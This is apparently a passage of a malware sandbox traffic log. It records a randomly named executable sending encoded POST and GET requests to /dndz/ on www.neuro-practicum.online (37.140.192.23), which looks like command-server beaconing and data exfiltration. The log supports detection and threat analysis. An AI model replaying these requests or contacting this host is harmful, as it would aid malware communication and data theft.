Oct 7, 2024 11:54:27.826095104 CEST	706	OUT	POST /dndz/ HTTP/1.1 Host: www.neuro-practicum.online Accept: / Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.neuro-practicum.online Referer: http://www.neuro-practicum.online/dndz/ Connection: close Content-Length: 225 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36 Data Raw: 56 7a 4b 34 6f 38 4a 78 3d 2f 42 78 36 72 61 4d 2f 4c 6a 31 54 6a 4e 44 4e 2f 49 4c 53 4f 4e 55 70 47 78 7a 72 54 4c 49 5a 46 56 55 4c 72 69 4c 55 6c 6b 51 70 55 39 32 32 44 6e 37 64 47 68 46 35 6f 50 41 77 79 78 50 42 51 71 69 71 37 77 6d 68 52 6f 4a 62 61 30 75 4b 6b 66 44 33 76 55 59 6f 64 6c 30 54 55 66 4f 38 74 39 55 4e 56 6b 78 71 78 6a 33 41 58 62 2f 62 54 66 4c 37 6b 57 67 36 45 71 75 77 35 62 44 4c 44 4c 6b 31 33 78 44 6e 59 62 4d 44 48 70 4b 39 58 37 42 35 49 72 32 51 78 77 38 71 4c 66 54 75 2b 30 6d 47 74 32 35 68 35 2f 6b 66 6e 5a 6d 6c 64 48 4b 57 65 4e 4d 71 73 38 59 45 52 64 68 71 41 63 57 47 78 46 36 59 45 2f 57 62 62 51 4c 64 65 2b 50 39 38 65 41 3d Data Ascii: VzK4o8Jx=/Bx6raM/Lj1TjNDN/ILSONUpGxzrTLIZFVULriLUlkQpU922Dn7dGhF5oPAwyxPBQqiq7wmhRoJba0uKkfD3vUYodl0TUfO8t9UNVkxqxj3AXb/bTfL7kWg6Equw5bDLDLk13xDnYbMDHpK9X7B5Ir2Qxw8qLfTu+0mGt25h5/kfnZmldHKWeNMqs8YERdhqAcWGxF6YE/WbbQLde+P98eA=
Oct 7, 2024 11:54:28.065973997 CEST	1289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 07 Oct 2024 09:54:27 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: gzip Data Raw: 36 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd 5b 73 e3 46 b2 30 f8 ee 5f 41 f1 84 d5 a4 1b 84 70 e7 ad d1 1a 8f a7 7d ec 38 33 b6 63 da 67 26 36 34 0a 05 44 82 22 dc 20 c0 03 80 52 cb 12 4f 6c ec c3 fe 8f 7d dc b7 f3 b0 5f c4 ee c3 be ec 2f 98 ef 1f 6d 66 15 ee 37 16 08 52 ea ee 23 d9 4d 82 40 55 66 65 56 56 56 66 56 55 e2 cd c9 dc 9d 05 f7 6b b3 b3 0c 56 f6 db 37 f8 d9 b1 0d e7 46 ef 7a 9b 6e 67 66 1b be af 77 2d ff ca 98 1b eb c0 ba 35 bb 9d b9 11 18 83 b5 e1 98 f6 60 e3 d9 7a 77 19 04 6b 7f 72 76 e6 9b de ad e9 89 a2 ca 2f 5d 3f b0 9c 1b de 33 e1 df e6 6c 65 38 c6 8d e9 75 01 ba 69 cc df be 59 99 81 d1 99 2d 0d cf 37 03 bd fb ef bf 7e 3f 18 75 c3 bb 8e b1 32 f5 ee ad 65 de ad 5d 2f 00 fc ae 13 98 0e 94 ba b3 e6 c1 52 9f 9b b7 d6 cc 1c 90 1f 9c e5 58 81 65 d8 03 7f 66 d8 a6 2e 66 41 78 ee b5 1b f8 29 00 8e 6b 39 73 f3 23 94 0a ac c0 36 df fe f3 ff f8 9f ff db ff fc 5f ff f9 5f ff fc 7f ff f9 7f ff cf ff fd 9f ff d5 81 8b ff 71 ea 5c fb eb 29 5c fd d7 3f ff 9f 7f fe 5f ff fc 1f 78 f5 e6 8c [TRUNCATED] Data Ascii: 6000[sF0_Ap}83cg&64D" ROl}_/mf7R#M@UfeVVVfVUkV7Fzngfw-5`zwkrv/]?3le8uiY-7~?u2e]/RXef.fAx)k9s#6__q\)\?_xVxYsmw}sw?t;;kM??c@7y!^AR}oqg\|Z\]Gxvw}Xtxnf;t=q?Y)~gu&3)Q,,i,lm0'p#tn,g"LME2%(#`f`OL~r{p\|~k16fn<w'X,;c=XBll<6<[:z\|J;/\+\|,t KIY?!P]A3>\eyGF<v4je:ss520fX&B;5n29MQrvIEtjj\{[v4&nGJsk6L_QY\|MG/W?wNA-oZUoN5RJV&S'"_c\|ee5MULz$zj@D9Ah~FY`pW?c:`i$eCh;XT4V"xhauw9p( [TRUNCATED]
Oct 7, 2024 11:54:28.066363096 CEST	1289	IN	Data Raw: 01 e1 ca 00 c1 53 81 df 45 78 0c 3e 36 43 62 9b ae 33 10 55 0a ba 31 b9 6c 50 8b 44 26 c3 31 67 84 26 70 12 bb 30 34 fe fe 65 21 2d 94 c5 98 99 d2 12 1c 54 ec f6 25 b2 12 60 09 7d c4 ff 03 05 ee 1a c1 04 65 93 5a ca 43 41 e8 20 99 67 b2 d0 c6 64 Data Ascii: SEx>6Cb3U1lPD&1g&p04e!-T%`}eZCA gd-DDuO~x`n\ @V?,Q{AOtGr*[zoxm _dlO#e);N"RQI=2i7&m'w+P6T]+v\|Z
Oct 7, 2024 11:54:28.066497087 CEST	1289	IN	Data Raw: e6 1f d4 90 ce 70 e3 19 8c e8 08 ff 73 1b d0 0d 7b 23 69 fe 41 0d e7 0c 37 9e de 68 8e d1 3f af c1 dc b0 2f e2 c6 1f d2 50 ce b2 e2 e9 8d 64 c0 9f 18 c8 51 09 72 1c f1 ca 72 f0 6c 6f 74 36 7a b1 58 e4 9e 83 19 ed c6 47 a7 af 87 33 61 56 5a e2 6a Data Ascii: ps{#iA7h?/PdQrrlot6zXG3aVZjnx3c\A34Bc@dWm.9Y:`w(}.:6p];)q\<_MYk@ZeNzhImQDny?o/5IQf:^A1-f@\=Ics1OA
Oct 7, 2024 11:54:28.066512108 CEST	1289	IN	Data Raw: 81 5d 88 02 51 cf e8 3d ec 24 8e cd 71 48 93 f4 4c 3e c3 4e 4a 9a b9 0b 05 8a 9e dc 53 28 25 88 dd 49 d8 c9 0f 26 ff 20 cd 86 e7 75 0d 0a 2d 79 36 af 60 27 67 19 ed f0 34 45 cf e5 0b ec a4 a5 a1 1b 50 a4 e9 f9 3c 80 dd 8a 9b d1 f8 cf 10 f5 5c 76 Data Ascii: ]Q=$qHL>NJS(%I& u-y6`'g4EP<\voWyl"oLzN=a3<c3}4=sy~.@/&NL4IdI_MRM`2nocZl&N2iIKCH7I!
Oct 7, 2024 11:54:28.066672087 CEST	1289	IN	Data Raw: 77 3d 98 19 5e 39 cb bf ab aa 16 2c 37 ab 6b bf 5a 1e fe b4 a3 e2 66 5d 5a ed 5d 55 b5 cd 1a 67 85 d2 3a df 57 d5 f9 dd 05 ef ad a4 86 28 74 3f d7 b9 b7 f6 ef b3 b1 5c cb e7 ef dc ef 2f db 68 25 f6 6a 76 9a cb ce 62 29 17 3b 3d 67 09 f9 79 cd 72 Data Ascii: w=^9,7kZf]Z]Ug:W(t?\/h%jvb);=gyr,?4IqX4gQp~7'X5W[a(cQZV%/qT>)64lrY33z{BCf=PO169`\|7[Z9m#WWKiXj$e
Oct 7, 2024 11:54:28.066749096 CEST	1289	IN	Data Raw: 56 84 7f 48 73 2d 0d fd 39 cd b5 ca 5e 3a 8c b9 76 bc 4e aa 00 7f 40 73 8d a5 8b 8e 6f ae ad e6 4c e6 5a a6 1f 8f 6a ae 31 76 e9 01 cc 35 96 de 6d 63 b6 00 cf f6 30 d7 8e 4d ff 53 d0 fd c9 98 6b 19 b1 3d 8a b9 c6 d6 5d fb 9b 6b 2c 9d d5 c2 5c ab Data Ascii: VHs-9^:vN@soLZj1v5mc0MSk=]k,\fc!wo7U[k-&]t {nCk62Skt{xTK^oL?^ck,n7MSk=]k,^fc!wo7Uk%F
Oct 7, 2024 11:54:28.066993952 CEST	1289	IN	Data Raw: c8 8a c8 b2 a7 c1 b1 ba 05 b5 28 d7 75 1e 42 38 cc aa 62 82 49 b9 70 16 a9 0a 00 92 82 c0 c6 02 35 f9 de ba b6 76 97 c1 f7 35 ed 2c 44 5f b8 b4 b3 18 36 7e 67 a1 e4 c5 45 fb f6 06 6d cd 43 95 34 30 f5 07 b0 af 84 5b 65 cc 29 e7 45 35 55 c7 1f 1e Data Ascii: (uB8bIp5v5,D_6~gEmC40[e)E5U)\ _]5NY7u>.}@OQTJ/2,O\|tQ&/9!n4-fg_@;*3D.%(-I+^]%zl$Ed_]"c^\+"7m
Oct 7, 2024 11:54:28.067120075 CEST	1289	IN	Data Raw: b2 0a fc 1b f3 1a 88 00 ca 9d 28 d3 1f 40 17 36 9f 1f 82 9c 4a 43 1c b6 a3 21 34 08 86 33 80 50 06 48 37 48 af 40 d8 85 6d 19 83 88 8d f9 91 16 fe 30 40 68 46 28 8a f4 0b 65 15 da 2a cb 28 7a 12 48 35 fc 50 e8 07 11 63 7e 88 4a 41 92 81 0f 02 e1 Data Ascii: (@6JC!43PH7H@m0@hF(e(zH5Pc~JAt%i( N#TfFoO-wJGCIP^SxU2_`MP#Cdi"(?_$nA0BGA%EBUBBp5}cYG]<3:QLA@P1H@M
Oct 7, 2024 11:54:28.067464113 CEST	1289	IN	Data Raw: f8 78 59 ac 15 d2 77 9b af 92 27 5c 22 84 8b a3 9d 94 8f c2 cf 1c e5 72 39 5b 28 75 32 33 e5 6a 1d e5 a3 ca 2e df 41 79 59 97 8f 1a 53 fe ec 7d 5e 23 ec 25 94 ef 16 f6 cf a1 cf 9f 59 da bf 9c 3e 2f ea fd 48 3d df 30 ea 66 55 04 53 14 c3 75 43 01 Data Ascii: xYw'\"r9[(u23j.AyYS}^#%Y>/H=0fUSuC,@GrMI1``_E)HD ~"#@r$#@xHZ.=4x"HJawUV^ $V%U%7Kev^t)]k7B9atl%f43%MgYFY
Oct 7, 2024 11:54:28.067501068 CEST	1289	IN	Data Raw: d0 00 fa 19 c9 75 51 ac e5 44 aa b5 7d 85 3a d7 e9 79 7b a7 54 a4 35 56 89 2e 13 e8 a7 93 e7 d0 96 13 15 41 21 47 f6 2b 04 7a d4 46 a0 87 c7 17 68 79 4c 25 1a 9c 36 90 2e 22 2e d0 5c 62 e1 8c 46 44 99 c3 dd 50 95 c7 9a 3c a5 c8 f7 94 f4 50 89 27 Data Ascii: uQD}:y{T5V.A!G+zFhyL%6.".\bFDP<P'^#Z+\ye1.1udQ{282Onp.1/E-a^'e$a!LX^JxKE@mWG *PKjb(KZ1x)?m82
Oct 7, 2024 11:54:28.276176929 CEST	1289	IN	Data Raw: e9 dd 72 01 0e a7 0c a1 08 24 27 c2 79 20 69 19 0e 81 94 b6 25 2f c5 79 38 19 31 0e 01 e5 e4 2f a6 2a 27 c9 45 ba d2 a2 1c c2 ca c9 4e 08 ab 20 cc 79 58 59 69 0e 61 c9 a5 14 e6 c5 30 0f 2a 23 85 d1 14 3d 2a 83 54 14 e9 3c ac 9c 4c 87 d0 86 a5 fc Data Ascii: r$'y i%/y81/'EN yXYia0#=T<LJuRJC(Rr2@yCHwmsQx\IFI\gTgB+#!'y"LR,S("edJ(Y(9p"XZ9aH* /Y%070z#

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.11.30	49816	37.140.192.23	80	580	C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 11:54:30.579340935 CEST	1289	OUT	POST /dndz/ HTTP/1.1 Host: www.neuro-practicum.online Accept: / Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.neuro-practicum.online Referer: http://www.neuro-practicum.online/dndz/ Connection: close Content-Length: 3341 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36 Data Raw: 56 7a 4b 34 6f 38 4a 78 3d 2f 42 78 36 72 61 4d 2f 4c 6a 31 54 6a 4e 44 4e 2f 49 4c 53 4f 4e 55 70 47 78 7a 72 54 4c 49 5a 46 56 55 4c 72 69 4c 55 6c 6b 49 70 55 4c 4b 32 43 45 44 64 46 68 46 35 6e 66 41 31 79 78 4f 45 51 70 53 75 37 77 71 66 52 72 78 62 59 57 57 4b 7a 64 37 33 6b 55 59 6f 56 46 30 6f 4a 50 50 68 74 35 77 4a 56 6b 68 71 78 6a 33 41 58 63 50 62 44 37 66 37 33 6d 67 31 53 36 75 38 39 62 43 73 44 4c 38 50 33 78 47 61 59 59 73 44 48 62 69 39 55 4e 64 35 49 72 32 51 6c 67 38 72 4c 66 66 6a 2b 30 75 6f 74 33 78 4c 2b 4f 77 66 6b 63 6e 6f 46 46 69 78 4c 2b 38 48 6d 38 49 72 59 73 41 2f 4c 37 69 66 35 45 6a 6b 4f 74 36 55 53 57 54 61 4a 39 6e 6a 6d 6f 42 49 37 72 47 38 42 64 78 76 35 42 54 45 56 79 32 57 30 74 55 74 38 2f 2b 30 42 62 76 2b 35 4a 35 34 44 67 51 71 58 79 43 5a 65 47 54 4e 4b 68 50 6d 7a 34 43 57 38 36 6e 64 52 54 43 46 36 4e 46 62 43 2b 71 44 6d 59 5a 33 4b 50 76 6e 73 39 56 58 56 54 77 50 41 6c 47 68 4c 44 68 76 6b 7a 4f 4c 4e 34 49 47 39 53 52 36 4c 47 33 6f 36 53 42 55 34 [TRUNCATED] Data Ascii: VzK4o8Jx=/Bx6raM/Lj1TjNDN/ILSONUpGxzrTLIZFVULriLUlkIpULK2CEDdFhF5nfA1yxOEQpSu7wqfRrxbYWWKzd73kUYoVF0oJPPht5wJVkhqxj3AXcPbD7f73mg1S6u89bCsDL8P3xGaYYsDHbi9UNd5Ir2Qlg8rLffj+0uot3xL+OwfkcnoFFixL+8Hm8IrYsA/L7if5EjkOt6USWTaJ9njmoBI7rG8Bdxv5BTEVy2W0tUt8/+0Bbv+5J54DgQqXyCZeGTNKhPmz4CW86ndRTCF6NFbC+qDmYZ3KPvns9VXVTwPAlGhLDhvkzOLN4IG9SR6LG3o6SBU4UPL23Xc4FMsydnvjmxO8XGkydopGJ2eVguisjw22UPd7Z9DhZ8RTYmYqMVDPsSvuhYAuh6Ig04MrEPu3YYZBRmNQisxvnmExIS30IGZ12mRJcEO4ZM33oTtRMsimvC4dDtv4lBPgtd/305iXlU8+LEMp47iTBmplXXlEjqLpbXep7i0aFH9mviAL8sDyCWAGdNoUGFxtbjyaHA7gpac8gdTBuzbD9QhrlrNRlVPfmE5PYwsH+JRS8803ZWXIzTOEifNr8caqU51Yl6u8dbMC1Jembj2s/GCGhzLB8eYuj0aqs+E8ZGL9OzwgSi6r4bFN3a1nATIehqZVKwc1FWmesflqBJBkcdBZ390c37KkYFSSdyesalOkA+FjSCG3mCqcNtqGDENK8g8+np6K23trvIlOMKWn2WSP4llxITTnF+Kgd6Bdt2cmxHUJ9Q2V1U67GCSnDZS3pfFq2aqiE/duO
Oct 7, 2024 11:54:30.579408884 CEST	2534	OUT	Data Raw: 36 6b 65 37 44 57 35 77 59 43 59 32 35 55 47 38 32 42 2f 35 61 6c 4f 76 2f 4a 76 6d 49 38 55 4c 39 39 55 4c 59 64 32 63 7a 73 63 47 65 78 6e 44 4c 72 50 4c 2b 58 4f 58 67 54 57 72 6d 62 37 61 5a 6a 32 6c 31 68 6e 74 62 49 67 4e 32 4d 41 6d 76 46 Data Ascii: 6ke7DW5wYCY25UG82B/5alOv/JvmI8UL99ULYd2czscGexnDLrPL+XOXgTWrmb7aZj2l1hntbIgN2MAmvFKjk2k+SqbiL264gngYgldcVuxSCnTsK6urDn3Po9KjuK/19z/9x4JlAFODm9N9WXy7Q6czGEjVdVB3YwOwS4jHFALoF7YJpy0unkSHlbkAzF5lkeRYmwpvS2r88oPBmSh0t/fAFIjfiFtCXDoFPOIPgliSL4Jxgvw
Oct 7, 2024 11:54:30.823043108 CEST	1289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 07 Oct 2024 09:54:30 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: gzip Data Raw: 63 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd 5b 73 e3 46 b2 30 f8 ee 5f 41 f1 84 d5 a4 1b 84 70 e7 ad d1 1a 8f a7 7d ec 38 33 b6 63 da 67 26 36 34 0a 05 44 82 22 dc 20 c0 03 80 52 cb 12 4f 6c ec c3 fe 8f 7d dc b7 f3 b0 5f c4 ee c3 be ec 2f 98 ef 1f 6d 66 15 ee 37 16 08 52 ea ee 23 d9 4d 82 40 55 66 65 56 56 56 66 56 55 e2 cd c9 dc 9d 05 f7 6b b3 b3 0c 56 f6 db 37 f8 d9 b1 0d e7 46 ef 7a 9b 6e 67 66 1b be af 77 2d ff ca 98 1b eb c0 ba 35 bb 9d b9 11 18 83 b5 e1 98 f6 60 e3 d9 7a 77 19 04 6b 7f 72 76 e6 9b de ad e9 89 a2 ca 2f 5d 3f b0 9c 1b de 33 e1 df e6 6c 65 38 c6 8d e9 75 01 ba 69 cc df be 59 99 81 d1 99 2d 0d cf 37 03 bd fb ef bf 7e 3f 18 75 c3 bb 8e b1 32 f5 ee ad 65 de ad 5d 2f 00 fc ae 13 98 0e 94 ba b3 e6 c1 52 9f 9b b7 d6 cc 1c 90 1f 9c e5 58 81 65 d8 03 7f 66 d8 a6 2e 66 41 78 ee b5 1b f8 29 00 8e 6b 39 73 f3 23 94 0a ac c0 36 df fe f3 ff f8 9f ff db ff fc 5f ff f9 5f ff fc 7f ff f9 7f ff cf ff fd 9f ff d5 81 8b ff 71 ea 5c fb eb 29 5c fd d7 3f ff 9f 7f fe 5f ff fc 1f 78 f5 e6 8c [TRUNCATED] Data Ascii: c000[sF0_Ap}83cg&64D" ROl}_/mf7R#M@UfeVVVfVUkV7Fzngfw-5`zwkrv/]?3le8uiY-7~?u2e]/RXef.fAx)k9s#6__q\)\?_xVxYsmw}sw?t;;kM??c@7y!^AR}oqg\|Z\]Gxvw}Xtxnf;t=q?Y)~gu&3)Q,,i,lm0'p#tn,g"LME2%(#`f`OL~r{p\|~k16fn<w'X,;c=XBll<6<[:z\|J;/\+\|,t KIY?!P]A3>\eyGF<v4je:ss520fX&B;5n29MQrvIEtjj\{[v4&nGJsk6L_QY\|MG/W?wNA-oZUoN5RJV&S'"_c\|ee5MULz$zj@D9Ah~FY`pW?c:`i$eCh;XT4V"xhauw9p( [TRUNCATED]
Oct 7, 2024 11:54:30.823117971 CEST	1289	IN	Data Raw: 01 e1 ca 00 c1 53 81 df 45 78 0c 3e 36 43 62 9b ae 33 10 55 0a ba 31 b9 6c 50 8b 44 26 c3 31 67 84 26 70 12 bb 30 34 fe fe 65 21 2d 94 c5 98 99 d2 12 1c 54 ec f6 25 b2 12 60 09 7d c4 ff 03 05 ee 1a c1 04 65 93 5a ca 43 41 e8 20 99 67 b2 d0 c6 64 Data Ascii: SEx>6Cb3U1lPD&1g&p04e!-T%`}eZCA gd-DDuO~x`n\ @V?,Q{AOtGr*[zoxm _dlO#e);N"RQI=2i7&m'w+P6T]+v\|Z
Oct 7, 2024 11:54:30.823503017 CEST	1289	IN	Data Raw: e6 1f d4 90 ce 70 e3 19 8c e8 08 ff 73 1b d0 0d 7b 23 69 fe 41 0d e7 0c 37 9e de 68 8e d1 3f af c1 dc b0 2f e2 c6 1f d2 50 ce b2 e2 e9 8d 64 c0 9f 18 c8 51 09 72 1c f1 ca 72 f0 6c 6f 74 36 7a b1 58 e4 9e 83 19 ed c6 47 a7 af 87 33 61 56 5a e2 6a Data Ascii: ps{#iA7h?/PdQrrlot6zXG3aVZjnx3c\A34Bc@dWm.9Y:`w(}.:6p];)q\<_MYk@ZeNzhImQDny?o/5IQf:^A1-f@\=Ics1OA
Oct 7, 2024 11:54:30.823518038 CEST	1289	IN	Data Raw: 81 5d 88 02 51 cf e8 3d ec 24 8e cd 71 48 93 f4 4c 3e c3 4e 4a 9a b9 0b 05 8a 9e dc 53 28 25 88 dd 49 d8 c9 0f 26 ff 20 cd 86 e7 75 0d 0a 2d 79 36 af 60 27 67 19 ed f0 34 45 cf e5 0b ec a4 a5 a1 1b 50 a4 e9 f9 3c 80 dd 8a 9b d1 f8 cf 10 f5 5c 76 Data Ascii: ]Q=$qHL>NJS(%I& u-y6`'g4EP<\voWyl"oLzN=a3<c3}4=sy~.@/&NL4IdI_MRM`2nocZl&N2iIKCH7I!
Oct 7, 2024 11:54:30.823710918 CEST	1289	IN	Data Raw: 77 3d 98 19 5e 39 cb bf ab aa 16 2c 37 ab 6b bf 5a 1e fe b4 a3 e2 66 5d 5a ed 5d 55 b5 cd 1a 67 85 d2 3a df 57 d5 f9 dd 05 ef ad a4 86 28 74 3f d7 b9 b7 f6 ef b3 b1 5c cb e7 ef dc ef 2f db 68 25 f6 6a 76 9a cb ce 62 29 17 3b 3d 67 09 f9 79 cd 72 Data Ascii: w=^9,7kZf]Z]Ug:W(t?\/h%jvb);=gyr,?4IqX4gQp~7'X5W[a(cQZV%/qT>)64lrY33z{BCf=PO169`\|7[Z9m#WWKiXj$e
Oct 7, 2024 11:54:30.823854923 CEST	1289	IN	Data Raw: 56 84 7f 48 73 2d 0d fd 39 cd b5 ca 5e 3a 8c b9 76 bc 4e aa 00 7f 40 73 8d a5 8b 8e 6f ae ad e6 4c e6 5a a6 1f 8f 6a ae 31 76 e9 01 cc 35 96 de 6d 63 b6 00 cf f6 30 d7 8e 4d ff 53 d0 fd c9 98 6b 19 b1 3d 8a b9 c6 d6 5d fb 9b 6b 2c 9d d5 c2 5c ab Data Ascii: VHs-9^:vN@soLZj1v5mc0MSk=]k,\fc!wo7U[k-&]t {nCk62Skt{xTK^oL?^ck,n7MSk=]k,^fc!wo7Uk%F
Oct 7, 2024 11:54:30.824126005 CEST	1289	IN	Data Raw: c8 8a c8 b2 a7 c1 b1 ba 05 b5 28 d7 75 1e 42 38 cc aa 62 82 49 b9 70 16 a9 0a 00 92 82 c0 c6 02 35 f9 de ba b6 76 97 c1 f7 35 ed 2c 44 5f b8 b4 b3 18 36 7e 67 a1 e4 c5 45 fb f6 06 6d cd 43 95 34 30 f5 07 b0 af 84 5b 65 cc 29 e7 45 35 55 c7 1f 1e Data Ascii: (uB8bIp5v5,D_6~gEmC40[e)E5U)\ _]5NY7u>.}@OQTJ/2,O\|tQ&/9!n4-fg_@;*3D.%(-I+^]%zl$Ed_]"c^\+"7m
Oct 7, 2024 11:54:30.824240923 CEST	1289	IN	Data Raw: b2 0a fc 1b f3 1a 88 00 ca 9d 28 d3 1f 40 17 36 9f 1f 82 9c 4a 43 1c b6 a3 21 34 08 86 33 80 50 06 48 37 48 af 40 d8 85 6d 19 83 88 8d f9 91 16 fe 30 40 68 46 28 8a f4 0b 65 15 da 2a cb 28 7a 12 48 35 fc 50 e8 07 11 63 7e 88 4a 41 92 81 0f 02 e1 Data Ascii: (@6JC!43PH7H@m0@hF(e(zH5Pc~JAt%i( N#TfFoO-wJGCIP^SxU2_`MP#Cdi"(?_$nA0BGA%EBUBBp5}cYG]<3:QLA@P1H@M
Oct 7, 2024 11:54:30.824425936 CEST	1289	IN	Data Raw: f8 78 59 ac 15 d2 77 9b af 92 27 5c 22 84 8b a3 9d 94 8f c2 cf 1c e5 72 39 5b 28 75 32 33 e5 6a 1d e5 a3 ca 2e df 41 79 59 97 8f 1a 53 fe ec 7d 5e 23 ec 25 94 ef 16 f6 cf a1 cf 9f 59 da bf 9c 3e 2f ea fd 48 3d df 30 ea 66 55 04 53 14 c3 75 43 01 Data Ascii: xYw'\"r9[(u23j.AyYS}^#%Y>/H=0fUSuC,@GrMI1``_E)HD ~"#@r$#@xHZ.=4x"HJawUV^ $V%U%7Kev^t)]k7B9atl%f43%MgYFY
Oct 7, 2024 11:54:30.824583054 CEST	1289	IN	Data Raw: d0 00 fa 19 c9 75 51 ac e5 44 aa b5 7d 85 3a d7 e9 79 7b a7 54 a4 35 56 89 2e 13 e8 a7 93 e7 d0 96 13 15 41 21 47 f6 2b 04 7a d4 46 a0 87 c7 17 68 79 4c 25 1a 9c 36 90 2e 22 2e d0 5c 62 e1 8c 46 44 99 c3 dd 50 95 c7 9a 3c a5 c8 f7 94 f4 50 89 27 Data Ascii: uQD}:y{T5V.A!G+zFhyL%6.".\bFDP<P'^#Z+\ye1.1udQ{282Onp.1/E-a^'e$a!LX^JxKE@mWG *PKjb(KZ1x)?m82

Session ID	Source IP	Source Port	Destination IP	Destination Port
52	192.168.11.30	49817	37.140.192.23	80

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 11:54:34.178852081 CEST	399	OUT	GET /dndz/?VzK4o8Jx=yDZaovUERiFyto7X7qjvD9MpBTu9Oa8KDn0njxLOrnMFAtvfChH9CxwY1KA18WTPaaKEsGuRWrl0dmOTwKqBuB4/VF8aV5DH590ef19Cm2H2f9K3TYb4rxM=&0zu8A=o2yln6 HTTP/1.1 Host: www.neuro-practicum.online Accept: / Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
Oct 7, 2024 11:54:34.405030012 CEST	1289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 07 Oct 2024 09:54:34 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Data Raw: 66 65 62 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 22 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 64 61 74 61 2d 70 61 6e 65 6c 2d 75 72 6c 3d 22 68 74 74 70 73 3a 2f 2f 73 65 72 76 65 72 31 31 35 2e 68 6f 73 74 69 6e 67 2e 72 65 67 2e 72 75 2f 6d 61 6e 61 67 65 72 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e d0 a1 d1 82 d1 80 d0 b0 d0 bd d0 b8 d1 86 d0 b0 20 d0 bd d0 b5 26 6e 62 73 70 3b d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 b0 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 2f 2a 21 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a [TRUNCATED] Data Ascii: feb2<!doctype html><html lang="ru" class="is_adaptive" data-panel-url="https://server115.hosting.reg.ru/manager"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="robots" content="noindex"><title>  </title><style media="all">/!***********************************************************************************************************************************************************************************************!\ !* css ./node_modules/css-loader/index.js??clonedRuleSet-6.use[1]!./node_modules/postcss-loader/src/index.js!./node_modules/less-loader/dist/cjs.js!./bem/blocks.adaptive/b-page/b-page.less ! \************************************************************************************************************************************************************************************************/.b-page{display:flex;flex-direction:column;width:100%;min-width:320px;height:100%;padding:57p [TRUNCATED]
Oct 7, 2024 11:54:34.405122995 CEST	1289	IN	Data Raw: 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 2d 77 65 62 6b 69 74 2d 74 61 70 2d 68 69 67 68 6c 69 67 68 74 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 7d 68 74 6d 6c 3a 6e 6f 74 28 2e 69 73 5f 61 64 61 70 74 69 Data Ascii: -serif;background:#fff;-webkit-tap-highlight-color:transparent}html:not(.is_adaptive) .b-page{overflow-x:hidden}@media (min-width:1024px){.is_adaptive .b-page{overflow-x:hidden}}.b-page_type_parking{min-height:100vh}.b-page_type_error-page{pad
Oct 7, 2024 11:54:34.405366898 CEST	1289	IN	Data Raw: 6f 63 6b 7d 2e 62 2d 70 61 67 65 5f 5f 66 6f 6f 74 65 72 2d 64 6f 77 6e 7b 66 6c 65 78 3a 31 20 30 20 61 75 74 6f 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 2e 69 65 20 2e 62 2d 70 61 67 65 5f 5f 66 6f 6f 74 65 72 2d 64 6f 77 6e 7b 6d 69 Data Ascii: ock}.b-page__footer-down{flex:1 0 auto;overflow:hidden}.ie .b-page__footer-down{min-height:100%}@media (min-width:1024px){.is_adaptive .b-page__footer-down{overflow:visible}}.b-page__footer-down_overflow_visible{overflow:visible}.b-page__foote
